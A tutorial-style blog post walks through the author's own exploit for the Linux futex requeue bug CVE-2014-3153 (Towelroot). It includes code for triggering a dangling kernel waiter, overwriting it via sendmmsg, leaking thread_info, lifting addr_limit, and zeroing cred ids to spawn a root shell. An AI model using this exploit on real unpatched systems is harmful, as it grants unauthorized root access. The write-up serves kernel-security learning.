Exploiting CVE-2014–3153 (Towelroot)

Elon Gliksberg
20 min read · Jan 8, 2021

Originally published at https://elongl.github.io on January 8, 2021.

For quite some time now, I’ve been wanting to unveil the internals of modern operating systems.
I didn’t like how the most basic and fundamental level of a computer was so abstract to me,
and that I did not truly grasp how parts of it work; it felt like a "black box".

I’ve always been more than familiar with kernel and OS concepts,
but there’s a big gap from comprehending them as a user versus a kernel hacker.
I wanted to see code, not words.

In order to tackle that, I decided to take on a small kernel exploit challenge, and in parallel read Linux Kernel Development. Initially, the thought of reading the kernel's code seemed a bit spooky, "I wouldn't understand a thing". Little by little, it became less intimidating, and honestly, it turned out to be quite a bit easier than I expected.

Now, I feel tenfold more comfortable simply looking something up in the source in order to understand how it works, rather than searching man pages endlessly or consulting other people.

The book was really nice and all, but I wanted to get my hands dirty.
I searched for a disclosed vulnerability within the Linux kernel,
my plan being that I'd read its flat description and develop my own exploit for it.
A friend recommended CVE-2014–3153, also known as Towelroot, and I just went for it.
Back in the day, it was very commonly used to root Android devices.

The vulnerability is based around a mechanism called Futex within the kernel.
Futex being a wordplay on Fast userspace Mutex.

The Linux kernel provides futexes as a building block for implementing userspace locking.
A Futex is identified by a piece of memory which can be shared between processes or threads. In its bare form, a Futex is a counter that can be incremented and decremented atomically and processes can wait for its value to become positive.

Futex operation occurs entirely in userspace for the noncontended case.
The kernel is involved only to arbitrate the contended case.
Lock contention is a state where a thread attempts to acquire a lock that is already held by another thread.

The futex() system call provides a method for waiting until a certain condition becomes true. It is typically used as a blocking construct in the context of shared-memory synchronization. When using futexes, the majority of the synchronization operations are performed in user space. A user-space program employs the futex() system call only when it is likely that the program has to block for a longer time until the condition becomes true. Other futex() operations can be used to wake any processes or threads waiting for a particular condition.

I will cover only the terms and concepts related to the exploitation.
For a more profound insight about futexes, please reference man futex(2) and man futex(7).
I strongly suggest messing around with the examples in order to assess your understanding.

The futex() syscall isn't typically used by "everyday" programs, but rather by system libraries such as pthreads that wrap its usage. That's why the syscall doesn't have a glibc wrapper like most syscalls do. In order to call it, one has to use syscall(SYS_futex, ...).
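For reference, a raw invocation looks roughly like this (a minimal sketch based on futex(2); the wrapper name and its exact prototype are mine):

    #include <linux/futex.h>   /* FUTEX_* operation constants */
    #include <stdint.h>
    #include <sys/syscall.h>   /* SYS_futex */
    #include <time.h>          /* struct timespec */
    #include <unistd.h>        /* syscall() */

    /* glibc exposes no futex() wrapper, so we go through syscall() directly. */
    static long futex(uint32_t *uaddr, int op, uint32_t val,
                      const struct timespec *timeout,
                      uint32_t *uaddr2, uint32_t val3)
    {
        return syscall(SYS_futex, uaddr, op, val, timeout, uaddr2, val3);
    }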

Due to the blocking nature of futex() and it being a means of synchronizing between different tasks,
you'll notice that the exploit deals with threads a lot, which can get slightly confusing unless approached slowly.

There are two core concepts to understand about futexes in general, which we'll talk about a lot.

The first is something called a waiters list, also known as the wait queue.
This term refers to the blocking threads that are currently waiting for a lock to be released.
It is held in kernelspace and programs can issue syscalls to carry out operations on it. For instance, attempting to lock a contended lock would result in an insertion of a waiter, releasing a lock would pop a waiter from the list and reschedule its task.

The second is that there are two kinds of futexes: PI & non-PI.
PI stands for Priority Inheritance.

Priority inheritance is a mechanism for dealing with the priority-inversion problem. With this mechanism, when a high-priority task becomes blocked by a lock held by a low-priority task, the priority of the low-priority task is temporarily raised to that of the high-priority task, so that it is not preempted by any intermediate level tasks, and can thus make progress toward releasing the lock.

This introduces the ability to prioritize waiters within the futex's waiters list.
A higher-priority task is guaranteed to get the lock before a lower-priority task.
Non-PI operations, by contrast, make no such guarantee. For instance:

FUTEX_WAKE
This operation wakes at most val of the waiters that are waiting (e.g., inside FUTEX_WAIT) on the futex word at the address uaddr. Most commonly, val is specified as either 1 (wake up a single waiter) or INT_MAX (wake up all waiters). No guarantee is provided about which waiters are awoken (e.g., a waiter with a higher scheduling priority is not guaranteed to be awoken in preference to a waiter with a lower priority).

Both non-PI and PI futex types are used within the exploit.
The way PI futexes are implemented is with what the kernel calls a plist, a priority-sorted list.
If you don’t know what it is, you could take a look here, though this image sums it up perfectly.
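For reference, the relevant structures look roughly like this (an approximation of include/linux/plist.h from the 3.x era, written from memory, so treat the exact layout as an assumption):

    struct plist_head {
        struct list_head node_list;
    };

    struct plist_node {
        int              prio;       /* lower value = higher priority */
        struct list_head prio_list;  /* links the first node of each priority */
        struct list_head node_list;  /* links all nodes, kept sorted by prio */
    };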

All images are copied from Appdome.

Here’s the CVE description.

The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.

Let’s break it down.
First, we need to understand what’s a requeue operation in the context of futexes.
A waiter, i.e. a blocking thread that is contending on a lock, can be "requeued" by a running thread, meaning it is told to wait on a different lock instead of the one it currently waits on.

A waiter on a non-PI futex can be requeued to either a different non-PI futex, or to a PI-futex.
A waiter on a PI-futex cannot be requeued.
The bug itself is that there are no validations whatsoever on requeuing from a futex to itself.

This allows us to requeue a PI-futex waiter to itself, which clearly violates the following policy.

FUTEX_CMP_REQUEUE_PI
Requeues waiters that are blocked via FUTEX_WAIT_REQUEUE_PI on uaddr from a non-PI source futex (uaddr) to a PI target futex (uaddr2).

Take a look at the bug fix commit, both the description and the code changes.

Though, what actually happens when you requeue a waiter to itself? Good question.

Before actually diving into the exploit, I decided to provide a rough overview of how it works, for context further on. Eventually, what this bug gives us is a dangling waiter within the futex's waiters list. The way the exploit achieves that is as follows:

  1. Lock the PI futex.
  2. From another thread, wait on the non-PI futex with FUTEX_WAIT_REQUEUE_PI, naming the PI futex as the requeue target.
  3. Requeue that waiter from the non-PI futex onto the PI futex with FUTEX_CMP_REQUEUE_PI.
  4. Set the PI futex's userspace value (the futex-word) to 0.
  5. Requeue the PI futex onto itself with FUTEX_CMP_REQUEUE_PI.

And now we'll understand why this results in a dangling waiter.

There are a lot of different data types within the futex implementation code.
In order to cope with that, I made somewhat of a summary of them to help me keep track of what's going on. Feel free to use it as needed.

Step 1

We start off by locking the PI-futex. We do that because we want the first requeue (step 3) to block and create a waiter on the waiters list, rather than acquire the lock immediately. That waiter is destined to be our dangling waiter later on in the exploit.
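In userspace this boils down to a single FUTEX_LOCK_PI call on the PI futex word, roughly like this (argument layout per futex(2); the variable name is mine):

    /* Acquire the currently-free PI futex; the kernel stores our TID in it. */
    syscall(SYS_futex, &pi_futex, FUTEX_LOCK_PI, 0, NULL, NULL, 0);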

Step 2

In order to requeue a waiter from a non-PI -> PI futex, we first have to invoke FUTEX_WAIT_REQUEUE_PI on the non-PI futex, which in turn translates to the futex_wait_requeue_pi() function.
What this function does is take a non-PI futex and wait (FUTEX_WAIT) on it, and a PI futex that it can potentially be requeued to with a FUTEX_CMP_REQUEUE_PI command later on.
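The corresponding userspace call looks roughly like this (per futex(2); the variable names are mine):

    /* Wait on the non-PI futex (expected value 0), declaring pi_futex as the
     * futex we may later be requeued onto. Blocks until woken up. */
    syscall(SYS_futex, &non_pi_futex, FUTEX_WAIT_REQUEUE_PI, 0, NULL, &pi_futex, 0);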

The function defines various local variables, the most important of which is the rt_waiter variable.
Unsurprisingly, this variable is our waiter.

It contains the lock that it waits on, it holds references to other waiters in the waiters list through the list_entry plist node, and on top of that it also has a pointer to the task that is currently blocked on the lock.
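For orientation, the waiter structure looks roughly like this (abridged from kernel/rtmutex_common.h of that era, quoted from memory with debug-only fields dropped, so treat it as an approximation):

    struct rt_mutex_waiter {
        struct plist_node   list_entry;     /* node in the rt_mutex's waiters plist */
        struct plist_node   pi_list_entry;  /* node in the owner's pi_waiters plist */
        struct task_struct  *task;          /* the blocked task */
        struct rt_mutex     *lock;          /* the lock being waited on */
    };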

Needless to say, the locals are placed on the kernel stack. That's worth keeping in mind, because it'll be crucial to understand shortly.

Later on, it initializes the futex queue entry and enqueues it.

Note how it sets the requeue_pi_key to the futex key of the target futex.
This is part of what allows us to self-requeue. We'll see this in the final step.

At this point in the code, the function simply blocks and does not continue unless:

  1. A wakeup occurs.
  2. The process is killed.

Step 3

Next up, futex_requeue() is called by the FUTEX_CMP_REQUEUE_PI operation in another thread in order to do the heavy lifting of actually requeuing the waiter. This is the vulnerable and most important function in the exploit. The function is fairly long, so I'm not going to review all of its logic, but rather only address the relevant parts.
I do encourage you to skim over it and try to get a sense of what it does.
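From userspace, the thread issuing this requeue does something along these lines (per futex(2); the variable names are mine):

    /* Requeue up to one waiter from the non-PI futex onto the PI futex.
     * The 3rd argument (nr_wake) must be 1 for this op, the 4th argument is
     * nr_requeue, and the last one is the value *non_pi_futex must still hold. */
    syscall(SYS_futex, &non_pi_futex, FUTEX_CMP_REQUEUE_PI, 1, 1, &pi_futex, 0);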

Let’s quickly glance at the code that requeues the waiter at rt_mutex_start_proxy_lock().

And inside task_blocks_on_rt_mutex().

Now, rt_waiter of futex_wait_requeue_pi() is a node in the waiters list of our PI futex.

Step 4

Here we’ll set the userspace value of the futex, also known as the futex-word, to 0.
This is vital so that when the self-requeuing occurs, the call to futex_proxy_trylock_atomic() will succeed and wake the top waiter of the source futex, which is in fact the same as the destination futex. The problem arises when we have a waiter in the waiters list whose thread we can wake up without forcing its deletion from the waiters list.

It might seem confusing at first but it’ll clear up in the next step.

Step 5

In this step, we'll requeue the PI futex waiter to itself and invoke futex_requeue() once again.

Let’s take a look at futex_proxy_trylock_atomic() this time.

Pay attention to how it ensures that the requeue_pi_key of the top_waiter is equal to the requeue's target futex's key. This is why we need to self-requeue, and why it wouldn't be sufficient to just set the value of a different futex in userspace to 0 and requeue to it.

So the requirements for triggering the bug are:

  1. The requeue's target futex is the same one that was passed as the target to futex_wait_requeue_pi().
  2. There’s a waiter that is actively contending on the source futex.

The only scenario that meets both these requirements is a self-requeue.

Other than that, basically all it does is call futex_lock_pi_atomic() and if the lock was acquired,
wake up the top waiter of the source futex.

The function attempts to atomically compare-and-exchange the futex-word. It compares it to 0 which is the value that signals the lock is free and exchanges it with the task's PID.

This operation is unlikely to succeed, because the user could've done it in userspace and avoided the expensive syscall; the assumption is that the user wasn't able to acquire the lock in userspace and needed the kernel's "help". That's why it would be a "surprise" if it was able to get the lock.
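To make that concrete, the userspace fast path that normally precedes FUTEX_LOCK_PI looks something like this (a sketch of the idea, not glibc's actual code):

    /* Fast path: if the futex-word is 0 (free), CAS our TID into it and we
     * own the lock without entering the kernel at all. */
    pid_t tid = syscall(SYS_gettid);
    if (__sync_bool_compare_and_swap(&pi_futex, 0, (uint32_t)tid)) {
        /* Lock acquired in userspace, no syscall needed. */
    } else {
        /* Contended: fall back to the kernel. */
        syscall(SYS_futex, &pi_futex, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
    }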

Recalling the function above, if we successfully took control of the lock, we’d wake the top waiter, which is the waiter that was added to the waiters list on the first requeue (step 3).
Because we overwrote the value in userspace (step 4), the function succeeds and wakes the waiter.

When futex_requeue() wakes up the waiter, it sets the rt_waiter to NULL in order to signal futex_wait_requeue_pi() that the atomic lock acquisition was successful.

Its usage is seen here within futex_wait_requeue_pi().

And as we can see, rt_mutex_finish_proxy_lock() is not being called since rt_waiter is NULL, and therefore the waiter is kept as-is within the waiters list.

Recap

We start off by locking a PI futex. Then we simply requeue a thread to it, which creates a waiter entry on the futex's waiters list. Afterwards, we overwrite the futex-word with 0. Once we requeue the futex onto itself, the attempt to atomically own the lock and wake the top waiter on the source (which is also the destination) futex succeeds.

This leaves us with a dangling waiter on the waiters list whose thread has continued and is up and running. Now, the waiter entry points to garbage kernel stack memory. The original rt_waiter is long gone and was destroyed by other function calls on the stack.

Our waiter, a node in the waiters list, is now completely corrupted.

I won't go too in depth as to how I built the kernel, since there are a million tutorials out there on how to do that. I'd merely state that I've been using a 3.11.4 i386 kernel for this exploit, which I compiled on a Xenial (Ubuntu 16.04) Docker container.

The only actual hassle was getting my hands on the right gcc version for the corresponding kernel version that I worked on. I compared the GCC releases with the Linux kernel version history and tried various versions that seemed to fit by release date. Ultimately gcc-5 was what did the job for me.

It would be virtually impossible to do all of that without building your own kernel. The ability to debug the code and add your own logs within it is invaluable.

For actually running the kernel, I’ve used QEMU as my emulator.
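Something along these lines is enough to boot it (the kernel image and rootfs paths are placeholders, not my exact setup):

    # Boot the freshly built kernel; -s exposes a gdb stub on tcp::1234.
    qemu-system-i386 \
        -kernel arch/x86/boot/bzImage \
        -initrd rootfs.cpio.gz \
        -append "console=ttyS0 root=/dev/ram rw" \
        -nographic \
        -s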

Now’s the time for the actual fun.

Eventually, our goal would be to escalate to root privileges.
The way we'd do that is by achieving arbitrary read & write within the kernel's memory, and then overwriting our process' cred struct, which dictates the security context of a task.

The most fundamental members of cred are presumably the real uid and gid, but it also stores other properties such as the task's capabilities and many others.

But how would we go about that while solely having a wild reference to that waiter?
Quite frankly, the idea is fairly simple. There's nothing new about corrupting a node within a linked list in order to gain read and write capabilities, and the same applies here. We'd need to find a way to write to that dangling waiter, and then perform certain operations on it so that the kernel would do as we please.

Kernel Crash

But let’s start small. For now we’ll just attempt to crash the kernel.

I wrote a program that implements the steps that we listed above.
Let’s analyze it before going into the actual exploitation. Here’s the code.
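The original listing was embedded as an image, so here is a rough reconstruction of the same steps. The wrapper names mirror the ones mentioned below, the arguments follow futex(2), and the sleep-based synchronization is my simplification, so treat this as a sketch rather than the original program:

    #define _GNU_SOURCE
    #include <linux/futex.h>
    #include <stdint.h>
    #include <sys/mman.h>
    #include <sys/syscall.h>
    #include <sys/wait.h>
    #include <unistd.h>

    static int flock(uint32_t *uaddr)
    {
        /* FUTEX_LOCK_PI: acquire the PI futex, blocking if it's contended. */
        return syscall(SYS_futex, uaddr, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
    }

    static int fwait_requeue(uint32_t *uaddr, uint32_t *uaddr2, uint32_t val)
    {
        /* FUTEX_WAIT_REQUEUE_PI: wait on uaddr, requeue-able onto uaddr2. */
        return syscall(SYS_futex, uaddr, FUTEX_WAIT_REQUEUE_PI, val, NULL, uaddr2, 0);
    }

    static int frequeue(uint32_t *uaddr, uint32_t *uaddr2, int nr_requeue, uint32_t val)
    {
        /* FUTEX_CMP_REQUEUE_PI: wake/requeue waiters from uaddr to uaddr2,
         * provided *uaddr still equals val. nr_wake must be 1 for this op. */
        return syscall(SYS_futex, uaddr, FUTEX_CMP_REQUEUE_PI, 1, nr_requeue, uaddr2, val);
    }

    int main(void)
    {
        /* Two futex words shared between the parent and the forked child. */
        uint32_t *futexes = mmap(NULL, sizeof(uint32_t) * 2, PROT_READ | PROT_WRITE,
                                 MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        uint32_t *non_pi = &futexes[0], *pi = &futexes[1];

        flock(pi);                        /* Step 1: own the PI futex. */

        if (fork() == 0) {
            fwait_requeue(non_pi, pi, 0); /* Step 2: block, requeue-able to pi. */
            return 0;                     /* Reached only once the bug wakes us. */
        }

        sleep(1);                         /* Crude wait for the child to block. */
        frequeue(non_pi, pi, 1, 0);       /* Step 3: requeue the waiter onto pi. */
        *pi = 0;                          /* Step 4: make the lock look free. */
        frequeue(pi, pi, 1, 0);           /* Step 5: self-requeue, triggering the bug. */

        wait(NULL);                       /* The child's exit path trips over the
                                             dangling waiter and crashes the kernel. */
        return 0;
    }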

The flock, fwait_requeue, and frequeue functions are implemented in a small futex wrappers file that I've created for simplification and ease on the eyes.

We start off by allocating sizeof(uint32_t) * 2 bytes of R/W memory, which holds our two futexes.
Mind the MAP_SHARED flag that is passed to the mmap call in order to signal that the memory needs to be shared between the main process and the process spawned by the fork() call.

Side-comment: In the actual exploit you'd see that I'm using pthreads rather than fork(), which makes the code much clearer; there's also no need to map shared memory since all threads share the same virtual address space.

Now let’s see this in action.

If you paid attention to the call trace, you would spot that the kernel crashes once the process itself terminates (do_exit). What happens is that the kernel attempts to clean up the process' resources (mm_release), specifically the PI state list (exit_pi_state_list), and in doing so it unlocks all the futexes that the process holds. During the process of releasing them, the kernel tries to unlock our corrupted waiter as well, which causes a crash.

To be more accurate, it occurs here.

The function compares the lock that the top waiter claims it waits on to the actual lock. Because the waiter is completely bugged, its lock member no longer points to the corresponding rt_mutex and therefore causes a crash.

DOSing the system is pretty cool, but let’s make it more interesting by escalating to root privileges.

I intentionally do not post the entire exploit in advance because that would most likely be too overwhelming. Instead, I’ll append code blocks by stages.
If you do prefer to have the entire exploit available in hand, it can be found here.

Writing To The Waiter

In order to make use of our dangling waiter, we’d first need to find a way to write to it.
A quick reminder: our waiter is placed on the kernel stack. With that in mind, we need to somehow be able to write a controlled buffer to the place the waiter was held within the stack. Given that we're just a userspace program, our way of writing data to the kernel's stack is by issuing system calls.

But how do we know which syscall to invoke?
Luckily for us, the kernel comes with a useful tool called checkstack.
It can be found within the source under scripts/checkstack.pl.

The script lists the stack depth, i.e. the size of the stack frame, of each function within the kernel. This helps us estimate which syscall we should use in order to overlap with the waiter's location on the kernel stack.
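An invocation along these lines does the trick (following the usage comment at the top of the script; the grep filter is just my convenience):

    # List kernel functions by stack usage and filter for the candidates.
    objdump -d vmlinux | perl scripts/checkstack.pl i386 | grep -E 'futex|sendmsg'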

We enforce two limitations on the system call we’re looking for.

  1. It is deep enough in order to overlap with our dangling rt_waiter.
  2. The local variable within the function that overlaps rt_waiter is controllable.

The syscalls sendmsg, recvmsg, and sendmmsg are the adjacent functions to futex_wait_requeue_pi in terms of stack usage.
That should be a good place to start. We'll be using sendmmsg throughout the exploit.

I set two breakpoints, at futex_wait_requeue_pi() and ___sys_sendmsg(), in order to understand what arguments we should pass to the sendmmsg syscall so that rt_waiter is under our control.

When the breakpoint hits on futex_wait_requeue_pi(), I do nothing besides storing the address of rt_waiter in $waiter. When it hits on ___sys_sendmsg(), I check for the address of the local variable iovstack, which is of type struct iovec[8], and examine its size.

This proved that futex_wait_requeue_pi()'s rt_waiter overlaps with ___sys_sendmsg()'s iovstack.

Let's take a look at sendmmsg's signature.
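As given in sendmmsg(2):

    #define _GNU_SOURCE
    #include <sys/socket.h>

    int sendmmsg(int sockfd, struct mmsghdr *msgvec, unsigned int vlen,
                 int flags);

    struct mmsghdr {
        struct msghdr msg_hdr;  /* Message header */
        unsigned int  msg_len;  /* Number of bytes transmitted */
    };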

At this point I suggest understanding the syscall itself.

The sendmmsg() system call is an extension of sendmsg(2) that allows the caller to transmit multiple messages on a socket using a single system call. (This has performance benefits for some applications.)

The arguments are pretty trivial and essentially the same as sendmsg's, only that there's an mmsghdr which can contain multiple msghdr structures.
If you're unfamiliar with the syscall, give it a read at man sendmmsg(2).

In order to invoke sendmmsg successfully, we'd need a pair of connected sockets that we can send the data to. It is very important to understand that we want ___sys_sendmsg() to block so that we can take advantage of the waiter's corrupted state while it's under our control.

Typically, the function sends the data over the socket and exits. In order to make it block, we’d need to use SOCK_STREAM as our socket type which provides a reliable connection-based byte stream. This grants us the blocking capabilities we've talked about. On top of that, we'd need to fill up the "send buffer" so that data can't be sent over the socket, unless data is read on the other end.

I’ve crafted a function that does just that.
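It looks roughly like this (a sketch; the helper and variable names are assumptions on my part):

    #include <assert.h>
    #include <errno.h>
    #include <sys/socket.h>

    static int socks[2];

    static void setup_sockets(void)
    {
        /* A connected pair of blocking SOCK_STREAM UNIX sockets. */
        socketpair(AF_UNIX, SOCK_STREAM, 0, socks);

        /* Fill the send buffer so a later blocking send() cannot complete. */
        while (send(socks[0], "AAAAAAAA", 8, MSG_DONTWAIT) != -1)
            ;
        assert(errno == EWOULDBLOCK);
    }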

The function creates a pair of UNIX sockets of type SOCK_STREAM and then sends AAAAAAAA over the socket until the call to send fails with EWOULDBLOCK as the errno. Note the MSG_DONTWAIT flag that makes the send return immediately instead of blocking.

MSG_DONTWAIT
Enables nonblocking operation; if the operation would block, EAGAIN or EWOULDBLOCK is returned.

Afterwards we assert that EWOULDBLOCK is in fact the reason the operation failed.

Next up, we’re ready for actually invoking our sendmmsg to overwrite rt_waiter. Exciting!

For the sake of overwriting the waiter's list entries properly, which is what we're interested in, we need to lay out the iovec in userspace so that it lines up with iovstack in kernelspace accordingly.

In this function I set up the messages, the iovec, in the hope that they would overwrite the waiter's struct once I call sendmmsg. Once again, I've placed two breakpoints at futex_wait_requeue_pi() and ___sys_sendmsg().

There are many interesting things to look at from this experiment. Let’s go over it.

Just as before, I store rt_waiter's address. Upon hitting ___sys_sendmsg(), I continue the execution until the function is about to exit. However, because the function blocks, I have to interrupt the debugger with a ^C. By the time the function blocks, it has already filled the iovstack. After I do that, I browse the waiter struct and see that the overwrite occurred just as I wanted it to.

(In reality there’s only a single waiter)

That’s great! We can now overwrite the dangling waiter’s memory.

Let's review this as a whole within the exploit code.

We've already reviewed setup_msg() and setup_sockets(). fwait_requeue() blocks until the self-requeue is triggered; the first thing that happens when it returns is a call to sendmmsg() to overwrite the waiter, which also blocks.

You can see that I create another thread called ref_holder which also attempts to lock pi_futex, which in turn forms another waiter instance. The reason this is needed is that the futex's state would get destroyed if there weren't any contending waiters on the lock.

Our next goal is to leak an address that would help us target the task_struct of our process, which contains its cred, so that we can overwrite it later to gain root privileges.

The way we go about it is by using a fake waiter: when we attempt to lock the futex once again, another waiter is added to the waiters list, which results in writes to its adjacent nodes, which are under our control. Once that happens, we're able to inspect the leaked kernel address from userspace via the fake waiter's list nodes.

Let’s first address what’s called a “Thread Info”.
thread_info is a thread descriptor that is held within the kernel and is placed within the kernel stack's address space. For each thread that we create using pthread_create(), a new thread_info is generated in the kernel.

The reason it interests us is because it's relatively easy to get its address once you have a leak, and the more interesting reason is that it contains a pointer to the process' task_struct. Just to clarify, a new task_struct is also created for each thread.
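For reference, the x86 thread_info looks roughly like this (abridged and written from memory; the authoritative definition lives in arch/x86/include/asm/thread_info.h):

    struct thread_info {
        struct task_struct  *task;          /* main task structure */
        struct exec_domain  *exec_domain;   /* execution domain */
        __u32               flags;          /* low level flags */
        __u32               status;         /* thread synchronous flags */
        __u32               cpu;            /* current CPU */
        int                 preempt_count;
        mm_segment_t        addr_limit;     /* userspace address limit */
        /* ... further fields omitted ... */
    };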

In order to do the actual leak, we link together two fake waiters. One is named fake_waiter which is used for general list corruption, and the other is called leaker_waiter because its sole usage is to leak addresses through.

By linking I mean in practice that we set the previous node of the fake_waiter to be the leaker_waiter, and set its priority to be the default priority of a task plus one so that it'll place itself after the leaker_waiter. Priority is a value that correlates to the process' niceness.

Those aren’t the actual priorities but the idea remains.

After we’ve linked the waiters in userspace, we call lock_pi_futex() on another thread so that a waiter is created which attempts to add itself into the list. Naturally, once a node is added into a list, it writes to its adjacent nodes, in our case to leaker_waiter.

Awesome! We’ve leaked a kernel stack address of one of the threads in our program.

In order to target its thread_info, all we have to do is AND its address with THREAD_INFO_BASE. You can see that from current_thread_info()'s implementation, though that might vary across different architectures. Here's the source for x86.
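In the exploit, that mask presumably looks something like this (THREAD_SIZE being 8 KiB on a stock i386 build is an assumption about this particular configuration):

    /* thread_info sits at the base of the 8 KiB kernel stack, so masking off
     * the low 13 bits of any leaked stack address points right at it. */
    #define THREAD_INFO_BASE (~(8192 - 1))

    uint32_t thread_info_addr = leaked_stack_addr & THREAD_INFO_BASE;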

We have a hold of the thread_info location in memory.

Just as we can read by corrupting the list, we can utilize the same technique in order to use it for writing purposes. The first memory area that we’ll be targeting is what’s called the “Address Limit”.

It lies under thread_info.addr_limit, as you can see in thread_info above. It is used for limiting the virtual address space that is reserved for the user. When the kernel works with user-provided addresses, it compares them to the thread's addr_limit in order to verify that each is a valid userspace address. If the supplied address is smaller than addr_limit, the designated memory area is in fact in userspace.

The addr_limit is an excellent target for an initial kernel overwrite, because once you overwrite it with 0xffffffff, you gain full arbitrary read and write capabilities over kernel memory.

After we've executed leak_thread_info(), we're going to call escalate_priv(). The first thing that it does is register escalate_priv_sighandler as the SIGINT signal handler.

Let's briefly mention what signal handlers are and why we use them. A signal handler is a function that is called by the target environment when the corresponding signal occurs. The target environment suspends execution of the program until the signal handler returns.

This mechanism allows us to interrupt the process’ job in order to perform some other work. In our case, we’d like to form the kernel stack in a certain way and also be able to execute a piece of code on the same thread. However, in order to arrange the stack we have to perform a blocking operation because otherwise our arrangement would be overwritten, but if you block you can’t exploit the stack’s state.

That's why signals are needed and why they're used in our scenario. They allow us to execute code within the process' context outside its normal execution flow.

I'm reminding you that when talking about pthreads, all the signal handlers are shared with the parent process; that is because internally pthreads passes both the CLONE_THREAD and CLONE_SIGHAND flags when it creates the child task with clone().

CLONE_THREAD
The flags mask must also include CLONE_SIGHAND if CLONE_THREAD is specified.

Afterwards, we're going to place the address that we want to write to, that is &corrupter_thread_info->addr_limit, as the fake waiter's previous node. Once we attempt to lock the futex, the newly created waiter writes its own address to the addr_limit. That's not yet a value we control, but it is guaranteed to be bigger than the current limit, since the waiter lives at a kernel address, above the boundary of the userspace address space.

Now we've arrived at a scenario where addr_limit > &addr_limit is surely true. Once this condition is met, we can simply write to addr_limit once again on our own! This is where the signaling comes into play, and specifically the escalate_priv_sighandler from earlier.

Because each thread has its own thread_info, which in turn means that each thread also has its own addr_limit, we'd need a way to interrupt the specific thread whose addr_limit we've overwritten. Therefore, after we've "increased" the address limit, only that thread would be able to utilize and exploit this feature. This is where we signal the addr_limit_writer thread using pthread_kill() which triggers the execution of escalate_priv_sighandler.
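Put together, the flow is essentially this (whether the exploit registers the handler with signal() or sigaction() is an assumption on my part):

    #include <pthread.h>
    #include <signal.h>

    /* In escalate_priv(): register the handler for SIGINT. */
    signal(SIGINT, escalate_priv_sighandler);

    /* Later: interrupt the thread whose addr_limit was corrupted, so the
     * handler runs in that thread's context. */
    pthread_kill(addr_limit_writer, SIGINT);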

What this function does is read from and write to different areas of kernel memory. In order to do that, I wrote a small helper function. It exploits the fact that addr_limit has been overwritten: it creates a pipe which it reads from and writes to. The read() and write() syscalls internally invoke copy_from_user() and copy_to_user() within the kernel, which perform their checks against addr_limit.
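A minimal sketch of that pipe trick, with helper names that are my own:

    #include <unistd.h>

    static int pipefd[2];   /* created once with pipe(pipefd) */

    /* Write len bytes from a userspace buffer into kernel address kaddr. */
    static void write_kernel(void *kaddr, const void *ubuf, size_t len)
    {
        write(pipefd[1], ubuf, len);   /* copy_from_user() from our buffer  */
        read(pipefd[0], kaddr, len);   /* copy_to_user() into kernel memory */
    }

    /* Read len bytes from kernel address kaddr into a userspace buffer. */
    static void read_kernel(void *kaddr, void *ubuf, size_t len)
    {
        write(pipefd[1], kaddr, len);  /* copy_from_user() from kernel memory */
        read(pipefd[0], ubuf, len);    /* copy_to_user() into our buffer      */
    }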

Inside the signal handler, several operations are performed (a rough sketch follows the list).

  1. Cancel the address space access limitation by setting addr_limit to the highest value possible.
  2. Read the task_struct pointer of the corrupted thread.
  3. Read the parent’s task_struct pointer from the corrupted thread's task_struct via the group_leader member which points to it.
  4. Read the cred struct pointer from the parent's task_struct.
  5. Overwrite all the identifiers (uid, gid, suid, sgid, etc.) of the main process' cred struct.
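Conceptually, the handler's body boils down to something like this (the offsets are illustrative placeholders, not real values; the thread_info access assumes the abridged definition sketched earlier, and the helpers are the pipe-based ones from above):

    uint32_t task, leader, cred;
    uint32_t unlimited = 0xffffffff;
    uint32_t root_ids[8] = { 0 };  /* uid, gid, suid, sgid, euid, egid, fsuid, fsgid */

    /* 1. Lift the address space restriction entirely. */
    write_kernel(&corrupter_thread_info->addr_limit, &unlimited, sizeof(unlimited));
    /* 2. Our own task_struct pointer, straight out of thread_info. */
    read_kernel(&corrupter_thread_info->task, &task, sizeof(task));
    /* 3. The parent's task_struct, via the group_leader member. */
    read_kernel((void *)(task + GROUP_LEADER_OFFSET), &leader, sizeof(leader));
    /* 4. The parent's cred pointer. */
    read_kernel((void *)(leader + CRED_OFFSET), &cred, sizeof(cred));
    /* 5. Zero out every id, making the process root. */
    write_kernel((void *)(cred + IDS_OFFSET), root_ids, sizeof(root_ids));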

Now all that's left to do is call system("/bin/sh") on the main thread to drop a shell.
Because the child process inherits the cred struct, the shell will also run with root permissions.

This has been a lot of fun, and I’ve learned so much on the way.
I got to have the interaction I desired with the kernel, working with it and understanding how it works a bit better. Needless to say, there's an infinite amount of knowledge to be gathered, but this is a small step onwards. In the end, the exploit turns out to be relatively short, but the truly important part is getting there and being able to solve the puzzle.

The full repository can be found here.

If you have any questions, feel free to contact me and I’ll gladly answer.
Hope you enjoyed the read. Thanks!

Special thanks to Nspace who helped throughout the process.
